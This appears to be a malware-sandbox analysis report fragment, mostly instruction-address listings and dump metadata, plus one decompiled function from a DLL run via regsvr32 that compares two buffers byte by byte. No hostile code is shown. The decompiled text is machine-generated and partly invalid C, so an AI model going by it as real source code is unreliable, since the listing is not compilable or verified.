                                                                                                            0x1000c7f6
                                                                                                            0x1000c7fa
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c801
                                                                                                            0x1000c7b7
                                                                                                            0x1000c7b7
                                                                                                            0x1000c7b9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c804
                                                                                                            0x1000c80c
                                                                                                            0x1000c80f
                                                                                                            0x1000c812
                                                                                                            0x1000c816
                                                                                                            0x1000c819
                                                                                                            0x1000c81e
                                                                                                            0x1000c820
                                                                                                            0x1000c824
                                                                                                            0x1000c828
                                                                                                            0x1000c82b
                                                                                                            0x1000c830
                                                                                                            0x1000c832
                                                                                                            0x1000c834
                                                                                                            0x1000c837
                                                                                                            0x1000c839
                                                                                                            0x1000c83e
                                                                                                            0x1000c841
                                                                                                            0x1000c846
                                                                                                            0x1000c848
                                                                                                            0x1000c84a
                                                                                                            0x1000c84a
                                                                                                            0x1000c848
                                                                                                            0x1000c84d
                                                                                                            0x1000c84d
                                                                                                            0x1000c850
                                                                                                            0x1000c851
                                                                                                            0x1000c852
                                                                                                            0x1000c855
                                                                                                            0x1000c856
                                                                                                            0x1000c858
                                                                                                            0x1000c85a
                                                                                                            0x1000c85e
                                                                                                            0x1000c862
                                                                                                            0x1000c865
                                                                                                            0x1000c868
                                                                                                            0x1000c86c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c873
                                                                                                            0x1000c87b
                                                                                                            0x1000c87e
                                                                                                            0x1000c881
                                                                                                            0x1000c884
                                                                                                            0x1000c887
                                                                                                            0x1000c888
                                                                                                            0x1000c88a
                                                                                                            0x1000c88e
                                                                                                            0x1000c890
                                                                                                            0x1000c890
                                                                                                            0x1000c890
                                                                                                            0x1000c894
                                                                                                            0x1000c897
                                                                                                            0x1000c897
                                                                                                            0x1000c89a
                                                                                                            0x1000c89e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c8a8
                                                                                                            0x1000c8ab
                                                                                                            0x1000c8ab
                                                                                                            0x1000c8ae
                                                                                                            0x1000c8b0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c8c2
                                                                                                            0x1000c8c5
                                                                                                            0x1000c8c6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c8cf
                                                                                                            0x1000c8d5
                                                                                                            0x1000c8d6
                                                                                                            0x1000c8d9
                                                                                                            0x1000c8b5
                                                                                                            0x1000c8b5
                                                                                                            0x1000c8b6
                                                                                                            0x1000c7ec
                                                                                                            0x1000c7ec
                                                                                                            0x1000c7ed
                                                                                                            0x1000c7ef
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c9dc
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c8e7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c8de
                                                                                                            0x1000c8e0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c8f2
                                                                                                            0x1000c8f5
                                                                                                            0x1000c8f6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c901
                                                                                                            0x1000c904
                                                                                                            0x1000c907
                                                                                                            0x1000c908
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c915
                                                                                                            0x1000c916
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c7d4
                                                                                                            0x1000c9dd
                                                                                                            0x1000c9dd
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c7c5
                                                                                                            0x1000c7c7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c926
                                                                                                            0x1000c92d
                                                                                                            0x1000c92e
                                                                                                            0x1000c930
                                                                                                            0x1000c933
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c93b
                                                                                                            0x1000c93e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c945
                                                                                                            0x1000c948
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c951
                                                                                                            0x1000c954
                                                                                                            0x1000c957
                                                                                                            0x1000c958
                                                                                                            0x1000c95b
                                                                                                            0x1000c95c
                                                                                                            0x1000c95f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c969
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c96e
                                                                                                            0x1000c96f
                                                                                                            0x1000c96f
                                                                                                            0x1000c974
                                                                                                            0x1000c974
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c97c
                                                                                                            0x1000c97d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c982
                                                                                                            0x1000c985
                                                                                                            0x1000c988
                                                                                                            0x1000c98b
                                                                                                            0x1000c98c
                                                                                                            0x1000c98c
                                                                                                            0x1000c990
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c997
                                                                                                            0x1000c99b
                                                                                                            0x1000c9a0
                                                                                                            0x1000c9a0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c9a6
                                                                                                            0x1000c9a9
                                                                                                            0x1000c9ab
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c9b2
                                                                                                            0x1000c9b5
                                                                                                            0x1000c9b8
                                                                                                            0x1000c9bb
                                                                                                            0x1000c9be
                                                                                                            0x1000c9c1
                                                                                                            0x1000c9c4
                                                                                                            0x1000c9c7
                                                                                                            0x1000c9d8
                                                                                                            0x1000c9d9
                                                                                                            0x1000c9e0
                                                                                                            0x1000c9e0
                                                                                                            0x1000c9e2
                                                                                                            0x00000000
                                                                                                            0x1000c9e2
                                                                                                            0x1000c9cf
                                                                                                            0x1000c9d0
                                                                                                            0x1000c9d3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c9e9
                                                                                                            0x1000c9ea
                                                                                                            0x1000c9ea
                                                                                                            0x1000c9ec
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000ca13
                                                                                                            0x1000ca14
                                                                                                            0x1000ca17
                                                                                                            0x1000ca19
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c79e
                                                                                                            0x1000c7a1
                                                                                                            0x1000c7a4
                                                                                                            0x1000c7a7
                                                                                                            0x1000c7a8
                                                                                                            0x1000c7a8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c9f0
                                                                                                            0x1000c9f3
                                                                                                            0x1000c9f4
                                                                                                            0x1000c9f4
                                                                                                            0x1000c9f7
                                                                                                            0x1000c9f7
                                                                                                            0x1000c9f8
                                                                                                            0x1000c9fc
                                                                                                            0x1000c9fc
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c9ff
                                                                                                            0x1000ca02
                                                                                                            0x1000ca05
                                                                                                            0x1000ca08
                                                                                                            0x1000ca09
                                                                                                            0x1000ca09
                                                                                                            0x1000ca0a
                                                                                                            0x1000ca0d
                                                                                                            0x1000ca0d
                                                                                                            0x1000ca0f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000ca20
                                                                                                            0x1000ca23
                                                                                                            0x1000ca26
                                                                                                            0x1000ca29
                                                                                                            0x1000ca2a
                                                                                                            0x1000ca2e
                                                                                                            0x1000ca31
                                                                                                            0x1000ca32
                                                                                                            0x1000ca36
                                                                                                            0x1000ca37
                                                                                                            0x1000ca39
                                                                                                            0x1000ca3b
                                                                                                            0x1000c5e4
                                                                                                            0x1000c5e4
                                                                                                            0x1000c5e6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000ca43
                                                                                                            0x1000ca45
                                                                                                            0x1000ca47
                                                                                                            0x1000ca49
                                                                                                            0x1000ca4c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c788
                                                                                                            0x1000c788
                                                                                                            0x1000c78f
                                                                                                            0x1000c794
                                                                                                            0x1000c794
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c72b
                                                                                                            0x1000c779
                                                                                                            0x1000c77c
                                                                                                            0x1000c77c
                                                                                                            0x1000c77c
                                                                                                            0x1000c783
                                                                                                            0x00000000
                                                                                                            0x1000c783
                                                                                                            0x1000c6ab
                                                                                                            0x1000c6ad
                                                                                                            0x1000c6b0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c6b2
                                                                                                            0x1000c6b8
                                                                                                            0x1000c6bb
                                                                                                            0x1000c6c0
                                                                                                            0x1000c6c2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c6c8
                                                                                                            0x1000c6cf
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c6d1
                                                                                                            0x1000c629
                                                                                                            0x1000c62d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c62f
                                                                                                            0x1000c635
                                                                                                            0x1000c63f
                                                                                                            0x1000c63f
                                                                                                            0x1000c645
                                                                                                            0x1000c64f
                                                                                                            0x1000c655
                                                                                                            0x1000c658
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c65a
                                                                                                            0x1000c668
                                                                                                            0x1000c66e
                                                                                                            0x1000c670
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c670
                                                                                                            0x1000c647
                                                                                                            0x1000c64d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c64d
                                                                                                            0x1000c637
                                                                                                            0x1000c63d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c60e
                                                                                                            0x1000c619
                                                                                                            0x1000c61e
                                                                                                            0x1000c620
                                                                                                            0x1000c5b6
                                                                                                            0x1000c5b6
                                                                                                            0x1000ca6f
                                                                                                            0x1000ca6f
                                                                                                            0x1000ca74
                                                                                                            0x1000ca79
                                                                                                            0x1000ca79
                                                                                                            0x1000ca7b
                                                                                                            0x1000ca82
                                                                                                            0x1000ca89
                                                                                                            0x1000c796
                                                                                                            0x1000c79b
                                                                                                            0x1000c79b
                                                                                                            0x00000000
                                                                                                            0x1000c620
                                                                                                            0x1000c60c
                                                                                                            0x1000c5c7
                                                                                                            0x1000c5ca
                                                                                                            0x1000c5cc
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c5d7
                                                                                                            0x1000c5d8
                                                                                                            0x1000c5d9
                                                                                                            0x1000c5de
                                                                                                            0x00000000
                                                                                                            0x1000c5de
                                                                                                            0x1000c5a0
                                                                                                            0x1000c5a5
                                                                                                            0x1000c5b0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog3
                                                                                                            • String ID:
                                                                                                            • API String ID: 431132790-0
                                                                                                            • Opcode ID: 758592bd947f9ed89f49b444d2d6b49d7168a7d1a1213828d1cef9458bf8adda
                                                                                                            • Instruction ID: 7615ec66150bc53aaf0bc4c2e5f29b341d11434cf83223809089c5f4b93ec14a
                                                                                                            • Opcode Fuzzy Hash: 758592bd947f9ed89f49b444d2d6b49d7168a7d1a1213828d1cef9458bf8adda
                                                                                                            • Instruction Fuzzy Hash: 0FF16E7460430EAFEB14CF54CC80EAE7BA9EF05394F108529F815AB296DB35EE41DB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10022164 Relevance: .4, Instructions: 384COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10022164(void* __eax, void* __ecx) {
				void* _t196;
				signed int _t197;
				void* _t200;
				signed char _t206;
				signed char _t207;
				signed char _t208;
				signed char _t210;
				signed char _t211;
				signed int _t216;
				signed int _t316;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t330;
				void* _t332;
				void* _t334;
				void* _t337;
				void* _t339;
				void* _t341;
				void* _t344;
				void* _t346;
				void* _t348;
				void* _t351;
				void* _t353;
				void* _t355;
				void* _t358;
				void* _t360;
				void* _t362;

				_t200 = __ecx;
				_t196 = __eax;
				if( *((intOrPtr*)(__eax - 0x1f)) ==  *((intOrPtr*)(__ecx - 0x1f))) {
					_t316 = 0;
					L17:
					if(_t316 != 0) {
						goto L1;
					}
					_t206 =  *(_t196 - 0x1b);
					if(_t206 ==  *(_t200 - 0x1b)) {
						_t316 = 0;
						L28:
						if(_t316 != 0) {
							goto L1;
						}
						_t207 =  *(_t196 - 0x17);
						if(_t207 ==  *(_t200 - 0x17)) {
							_t316 = 0;
							L39:
							if(_t316 != 0) {
								goto L1;
							}
							_t208 =  *(_t196 - 0x13);
							if(_t208 ==  *(_t200 - 0x13)) {
								_t316 = 0;
								L50:
								if(_t316 != 0) {
									goto L1;
								}
								if( *(_t196 - 0xf) ==  *(_t200 - 0xf)) {
									_t316 = 0;
									L61:
									if(_t316 != 0) {
										goto L1;
									}
									_t210 =  *(_t196 - 0xb);
									if(_t210 ==  *(_t200 - 0xb)) {
										_t316 = 0;
										L72:
										if(_t316 != 0) {
											goto L1;
										}
										_t211 =  *(_t196 - 7);
										if(_t211 ==  *(_t200 - 7)) {
											_t316 = 0;
											L83:
											if(_t316 != 0) {
												goto L1;
											}
											_t319 = ( *(_t196 - 3) & 0x000000ff) - ( *(_t200 - 3) & 0x000000ff);
											if(_t319 == 0) {
												L5:
												_t321 = ( *(_t196 - 2) & 0x000000ff) - ( *(_t200 - 2) & 0x000000ff);
												if(_t321 == 0) {
													L3:
													_t197 = ( *(_t196 - 1) & 0x000000ff) - ( *(_t200 - 1) & 0x000000ff);
													if(_t197 != 0) {
														_t197 = (0 | _t197 > 0x00000000) + (0 | _t197 > 0x00000000) - 1;
													}
													L2:
													return _t197;
												}
												_t216 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
												if(_t216 != 0) {
													L86:
													_t197 = _t216;
													goto L2;
												} else {
													goto L3;
												}
											}
											_t216 = (0 | _t319 > 0x00000000) + (0 | _t319 > 0x00000000) - 1;
											if(_t216 == 0) {
												goto L5;
											}
											goto L86;
										}
										_t323 = (_t211 & 0x000000ff) - ( *(_t200 - 7) & 0x000000ff);
										if(_t323 == 0) {
											L76:
											_t325 = ( *(_t196 - 6) & 0x000000ff) - ( *(_t200 - 6) & 0x000000ff);
											if(_t325 == 0) {
												L78:
												_t327 = ( *(_t196 - 5) & 0x000000ff) - ( *(_t200 - 5) & 0x000000ff);
												if(_t327 == 0) {
													L80:
													_t316 = ( *(_t196 - 4) & 0x000000ff) - ( *(_t200 - 4) & 0x000000ff);
													if(_t316 != 0) {
														_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
													}
													goto L83;
												}
												_t316 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
												if(_t316 != 0) {
													goto L1;
												}
												goto L80;
											}
											_t316 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
											if(_t316 != 0) {
												goto L1;
											}
											goto L78;
										}
										_t316 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L76;
									}
									_t330 = (_t210 & 0x000000ff) - ( *(_t200 - 0xb) & 0x000000ff);
									if(_t330 == 0) {
										L65:
										_t332 = ( *(_t196 - 0xa) & 0x000000ff) - ( *(_t200 - 0xa) & 0x000000ff);
										if(_t332 == 0) {
											L67:
											_t334 = ( *(_t196 - 9) & 0x000000ff) - ( *(_t200 - 9) & 0x000000ff);
											if(_t334 == 0) {
												L69:
												_t316 = ( *(_t196 - 8) & 0x000000ff) - ( *(_t200 - 8) & 0x000000ff);
												if(_t316 != 0) {
													_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
												}
												goto L72;
											}
											_t316 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
											if(_t316 != 0) {
												goto L1;
											}
											goto L69;
										}
										_t316 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L67;
									}
									_t316 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L65;
								}
								_t337 = ( *(_t196 - 0xf) & 0x000000ff) - ( *(_t200 - 0xf) & 0x000000ff);
								if(_t337 == 0) {
									L54:
									_t339 = ( *(_t196 - 0xe) & 0x000000ff) - ( *(_t200 - 0xe) & 0x000000ff);
									if(_t339 == 0) {
										L56:
										_t341 = ( *(_t196 - 0xd) & 0x000000ff) - ( *(_t200 - 0xd) & 0x000000ff);
										if(_t341 == 0) {
											L58:
											_t316 = ( *(_t196 - 0xc) & 0x000000ff) - ( *(_t200 - 0xc) & 0x000000ff);
											if(_t316 != 0) {
												_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
											}
											goto L61;
										}
										_t316 = (0 | _t341 > 0x00000000) + (0 | _t341 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L58;
									}
									_t316 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L56;
								}
								_t316 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L54;
							}
							_t344 = (_t208 & 0x000000ff) - ( *(_t200 - 0x13) & 0x000000ff);
							if(_t344 == 0) {
								L43:
								_t346 = ( *(_t196 - 0x12) & 0x000000ff) - ( *(_t200 - 0x12) & 0x000000ff);
								if(_t346 == 0) {
									L45:
									_t348 = ( *(_t196 - 0x11) & 0x000000ff) - ( *(_t200 - 0x11) & 0x000000ff);
									if(_t348 == 0) {
										L47:
										_t316 = ( *(_t196 - 0x10) & 0x000000ff) - ( *(_t200 - 0x10) & 0x000000ff);
										if(_t316 != 0) {
											_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
										}
										goto L50;
									}
									_t316 = (0 | _t348 > 0x00000000) + (0 | _t348 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L47;
								}
								_t316 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L45;
							}
							_t316 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L43;
						}
						_t351 = (_t207 & 0x000000ff) - ( *(_t200 - 0x17) & 0x000000ff);
						if(_t351 == 0) {
							L32:
							_t353 = ( *(_t196 - 0x16) & 0x000000ff) - ( *(_t200 - 0x16) & 0x000000ff);
							if(_t353 == 0) {
								L34:
								_t355 = ( *(_t196 - 0x15) & 0x000000ff) - ( *(_t200 - 0x15) & 0x000000ff);
								if(_t355 == 0) {
									L36:
									_t316 = ( *(_t196 - 0x14) & 0x000000ff) - ( *(_t200 - 0x14) & 0x000000ff);
									if(_t316 != 0) {
										_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
									}
									goto L39;
								}
								_t316 = (0 | _t355 > 0x00000000) + (0 | _t355 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L36;
							}
							_t316 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L34;
						}
						_t316 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
						if(_t316 != 0) {
							goto L1;
						}
						goto L32;
					}
					_t358 = (_t206 & 0x000000ff) - ( *(_t200 - 0x1b) & 0x000000ff);
					if(_t358 == 0) {
						L21:
						_t360 = ( *(_t196 - 0x1a) & 0x000000ff) - ( *(_t200 - 0x1a) & 0x000000ff);
						if(_t360 == 0) {
							L23:
							_t362 = ( *(_t196 - 0x19) & 0x000000ff) - ( *(_t200 - 0x19) & 0x000000ff);
							if(_t362 == 0) {
								L25:
								_t316 = ( *(_t196 - 0x18) & 0x000000ff) - ( *(_t200 - 0x18) & 0x000000ff);
								if(_t316 != 0) {
									_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
								}
								goto L28;
							}
							_t316 = (0 | _t362 > 0x00000000) + (0 | _t362 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L25;
						}
						_t316 = (0 | _t360 > 0x00000000) + (0 | _t360 > 0x00000000) - 1;
						if(_t316 != 0) {
							goto L1;
						}
						goto L23;
					}
					_t316 = (0 | _t358 > 0x00000000) + (0 | _t358 > 0x00000000) - 1;
					if(_t316 != 0) {
						goto L1;
					}
					goto L21;
				} else {
					__edx =  *(__ecx - 0x1f) & 0x000000ff;
					__esi =  *(__eax - 0x1f) & 0x000000ff;
					__esi = ( *(__eax - 0x1f) & 0x000000ff) - ( *(__ecx - 0x1f) & 0x000000ff);
					if(__esi == 0) {
						L10:
						__esi =  *(__eax - 0x1e) & 0x000000ff;
						__edx =  *(__ecx - 0x1e) & 0x000000ff;
						__esi = ( *(__eax - 0x1e) & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
						if(__esi == 0) {
							L12:
							__esi =  *(__eax - 0x1d) & 0x000000ff;
							__edx =  *(__ecx - 0x1d) & 0x000000ff;
							__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
							if(__esi == 0) {
								L14:
								__esi =  *(__eax - 0x1c) & 0x000000ff;
								__edx =  *(__ecx - 0x1c) & 0x000000ff;
								__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L17;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L14;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L12;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L10;
				}
				L1:
				_t197 = _t316;
				goto L2;
			}

































                                                                                                            0x10022164
                                                                                                            0x10022164
                                                                                                            0x1002216a
                                                                                                            0x100221ea
                                                                                                            0x100221ec
                                                                                                            0x100221ee
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100221f4
                                                                                                            0x100221fa
                                                                                                            0x10022279
                                                                                                            0x1002227b
                                                                                                            0x1002227d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10022283
                                                                                                            0x10022289
                                                                                                            0x10022308
                                                                                                            0x1002230a
                                                                                                            0x1002230c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10022312
                                                                                                            0x10022318
                                                                                                            0x10022397
                                                                                                            0x10022399
                                                                                                            0x1002239b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100223a7
                                                                                                            0x10022427
                                                                                                            0x10022429
                                                                                                            0x1002242b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10022431
                                                                                                            0x10022437
                                                                                                            0x100224b6
                                                                                                            0x100224b8
                                                                                                            0x100224ba
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100224c0
                                                                                                            0x100224c6
                                                                                                            0x10022545
                                                                                                            0x10022547
                                                                                                            0x10022549
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10022557
                                                                                                            0x10022559
                                                                                                            0x1002213c
                                                                                                            0x10022144
                                                                                                            0x10022146
                                                                                                            0x10021d22
                                                                                                            0x10021d2a
                                                                                                            0x10021d2c
                                                                                                            0x10021d3d
                                                                                                            0x10021d3d
                                                                                                            0x10021932
                                                                                                            0x1002268e
                                                                                                            0x1002268e
                                                                                                            0x10022153
                                                                                                            0x10022159
                                                                                                            0x10022572
                                                                                                            0x10022572
                                                                                                            0x00000000
                                                                                                            0x1002215f
                                                                                                            0x00000000
                                                                                                            0x1002215f
                                                                                                            0x10022159
                                                                                                            0x10022566
                                                                                                            0x1002256c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002256c
                                                                                                            0x100224cf
                                                                                                            0x100224d1
                                                                                                            0x100224e8
                                                                                                            0x100224f0
                                                                                                            0x100224f2
                                                                                                            0x10022509
                                                                                                            0x10022511
                                                                                                            0x10022513
                                                                                                            0x1002252a
                                                                                                            0x10022532
                                                                                                            0x10022534
                                                                                                            0x10022541
                                                                                                            0x10022541
                                                                                                            0x00000000
                                                                                                            0x10022534
                                                                                                            0x10022520
                                                                                                            0x10022524
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10022524
                                                                                                            0x100224ff
                                                                                                            0x10022503
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10022503
                                                                                                            0x100224de
                                                                                                            0x100224e2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100224e2
                                                                                                            0x10022440
                                                                                                            0x10022442
                                                                                                            0x10022459
                                                                                                            0x10022461
                                                                                                            0x10022463
                                                                                                            0x1002247a
                                                                                                            0x10022482
                                                                                                            0x10022484
                                                                                                            0x1002249b
                                                                                                            0x100224a3
                                                                                                            0x100224a5
                                                                                                            0x100224b2
                                                                                                            0x100224b2
                                                                                                            0x00000000
                                                                                                            0x100224a5
                                                                                                            0x10022491
                                                                                                            0x10022495
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10022495
                                                                                                            0x10022470
                                                                                                            0x10022474
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10022474
                                                                                                            0x1002244f
                                                                                                            0x10022453
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10022453
                                                                                                            0x100223b1
                                                                                                            0x100223b3
                                                                                                            0x100223ca
                                                                                                            0x100223d2
                                                                                                            0x100223d4
                                                                                                            0x100223eb
                                                                                                            0x100223f3
                                                                                                            0x100223f5
                                                                                                            0x1002240c
                                                                                                            0x10022414
                                                                                                            0x10022416
                                                                                                            0x10022423
                                                                                                            0x10022423
                                                                                                            0x00000000
                                                                                                            0x10022416
                                                                                                            0x10022402
                                                                                                            0x10022406
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10022406
                                                                                                            0x100223e1
                                                                                                            0x100223e5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100223e5
                                                                                                            0x100223c0
                                                                                                            0x100223c4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100223c4
                                                                                                            0x10022321
                                                                                                            0x10022323
                                                                                                            0x1002233a
                                                                                                            0x10022342
                                                                                                            0x10022344
                                                                                                            0x1002235b
                                                                                                            0x10022363
                                                                                                            0x10022365
                                                                                                            0x1002237c
                                                                                                            0x10022384
                                                                                                            0x10022386
                                                                                                            0x10022393
                                                                                                            0x10022393
                                                                                                            0x00000000
                                                                                                            0x10022386
                                                                                                            0x10022372
                                                                                                            0x10022376
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10022376
                                                                                                            0x10022351
                                                                                                            0x10022355
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10022355
                                                                                                            0x10022330
                                                                                                            0x10022334
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10022334
